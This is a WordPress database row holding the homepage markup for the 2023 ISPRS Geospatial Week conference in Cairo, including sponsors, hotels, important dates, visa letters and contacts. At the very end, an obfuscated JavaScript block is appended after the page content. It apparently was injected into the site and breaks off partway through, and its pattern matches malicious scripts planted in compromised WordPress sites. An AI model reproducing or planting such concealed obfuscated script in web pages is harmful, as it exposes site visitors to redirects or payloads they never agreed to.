(4791,1,'2023-06-24 01:28:30','2023-06-24 01:28:30','','828c1ce1-4aca-4e92-a1e0-3d71a816c9fc','','inherit','open','closed','','828c1ce1-4aca-4e92-a1e0-3d71a816c9fc','','','2023-06-24 01:28:30','2023-06-24 01:28:30','',3066,'https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc.jpg',0,'attachment','image/jpeg',0),
(4792,1,'2023-06-24 01:30:03','2023-06-24 01:30:03','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570070822{margin-top: -20px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 